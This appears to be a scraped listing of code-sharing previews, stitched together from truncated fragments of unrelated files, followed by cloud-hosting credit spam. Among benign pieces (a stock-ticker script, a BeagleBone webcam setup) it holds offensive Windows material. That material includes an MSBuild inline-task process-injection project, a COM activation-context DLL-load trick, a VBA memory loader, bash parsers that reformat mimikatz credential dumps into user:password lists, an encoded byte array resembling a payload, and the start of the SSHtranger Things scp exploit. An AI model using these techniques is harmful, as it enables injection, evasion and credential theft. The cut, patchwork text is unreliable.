| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <-- x86 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <!- x64 --> | |
| <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe MSBuildQueueAPC.csproj --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask |
| #Doesn't Even Have to Be A Conformant COM DLL To trigger the load. | |
| # Sample DLL To inject here | |
| # https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179 | |
| $manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'; | |
| $ax = new-object -Com "Microsoft.Windows.ActCtx" | |
| $ax.ManifestText = $manifest; | |
| $DWX = $ax.CreateObject("JustMakeSomethingUp"); |
| # Converted from bash to Powershell reference: https://github.com/alexanderepstein/Bash-Snippets/blob/master/stocks/stocks | |
| function Get-Ticker([string]$CompanyName, [string]$Ticker) { | |
| $Query = "" | |
| if ($CompanyName) { | |
| $Query = $CompanyName.Replace(' ', '+') | |
| } | |
| elseif ($Ticker) { | |
| $Query = $Ticker.Replace(' ', '+') | |
| } |
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
To install and run mjpg_streamer on a BeagleBone with a Logitech C270 webcam:
git clone https://gist.github.com/jadonk/51a4d83c8180e259bcb5661002712166
bash 51a4d83c8180e259bcb5661002712166/install_mjpg_streamer.sh
Browse to your BeagleBone from a web browser specifying port 8090: http://beaglebone.local:8090
If you are looking for a quick python script to listen to the stream, try https://gist.github.com/jadonk/2a045611c134e2307a772a721b66ff5d.
| using System; | |
| using System.Collections.Generic; | |
| using System.Text; | |
| using System.CodeDom.Compiler; | |
| using Microsoft.CSharp; | |
| using System.IO; | |
| using System.Reflection; | |
| namespace InMemoryCompiler | |
| { | |
| class Program |
| Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password" | |
| First, before using these parsers, run: "dos2unix mimikatz_dump.txt" | |
| Mimikatz 1.0: | |
| cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u | |
| Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons): |
| $a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67, |
| ''' | |
| Title: SSHtranger Things | |
| Author: Mark E. Haase <mhaase@hyperiongray.com> | |
| Homepage: https://www.hyperiongray.com | |
| Date: 2019-01-17 | |
| CVE: CVE-2019-6111, CVE-2019-6110 | |
| Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt | |
| Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 | |
| We have nicknamed this "SSHtranger Things" because the bug is so old it could be |
1) Get $35 / $25 / $20 / $10 free DigitalOcean Credit.
2) Get DigitalOcean 1 Year Free Trial.
3) Get $100 Credit For 60 Days. $100 Free Credits
